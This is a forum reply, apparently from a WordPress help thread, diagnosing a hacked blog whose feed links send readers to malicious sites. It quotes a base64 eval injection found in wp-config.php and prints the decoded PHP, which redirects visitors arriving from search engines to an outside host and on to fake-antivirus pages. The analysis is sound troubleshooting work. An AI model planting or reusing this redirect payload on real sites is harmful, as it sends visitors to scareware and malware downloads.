Hi Jon,
It's got nothing to do with Reader or Google as such; your WordPress
site has been hacked.
If you look in the wp-config.php file you will see something like:
eval(base64_decode("CglpZiAoc3Rya .....<snip>.... Owp9Cgk="));
which decodes to:
if (stristr($_SERVER[HTTP_REFERER],"google")) {
    if (!stristr($_SERVER[HTTP_REFERER],".nu") and !stristr($_SERVER[HTTP_REFERER],"site") and !stristr($_SERVER[HTTP_REFERER],"inurl")){
        preg_match ("/q\=(.*)/",$_SERVER[HTTP_REFERER],$kk);
        if (stristr($kk[1],"&")) {
            preg_match ("/(.*?)\&/",$kk[1],$key2);
            $keyword=urldecode($key2[1]);
        }else {
            $keyword=urldecode($kk[1]);
        }
        header("Location: http://fgnfdfthrv.bee.pl/?q=".$keyword);
        exit();
    }
}elseif (stristr($_SERVER[HTTP_REFERER],"yahoo")) {
    preg_match ("/p\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
    header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
    exit();
}elseif (stristr($_SERVER[HTTP_REFERER],"bing")) {
    preg_match ("/q\=(.*?)&/",$_SERVER[HTTP_REFERER],$kk);
    header("Location: http://fgnfdfthrv.bee.pl/?q=".$kk[1]);
    exit();
}
As you can see, the referer is checked to be one of google, yahoo or
bing, and then a call is made to fgnfdfthrv.bee.pl, which returns a
redirect to p3p0.com.
I'm currently trying to track down how to disinfect this hack, which
led me to your post. Hope this helps,
Robin
On Feb 15, 1:45 pm, JonC wrote:
> Hi guys,
>
> I have a blog which uses Wordpress 2.9.1 (most recent version). Some
> of my readers complained that when they try to click the links in my
> feed (http://feeds.feedburner.com/raktalicskafeed) which are
> supposed to navigate them to my webpage they arrive at the following
> website: http://p3p0.com/?said=3333g&q=facebook, and sometimes to a
> fake antivirus page, which attempts to have them download an exe-file
> (and this site is recognized as a harmful site by Firefox).
>
> This issue only occurs in readers which are made by Google (iGoogle,
> Google Reader). I tried this in Opera's built-in RSS-browser, and in
> NewsCrawler too, but I didn't experience any problems.
>
> I suppose that there's something wrong with Reader (and iGoogle),
> because when I click on a link in other feedreader it works in the
> correct way. Btw if I add my original feed (http://raktalicska.hu/feed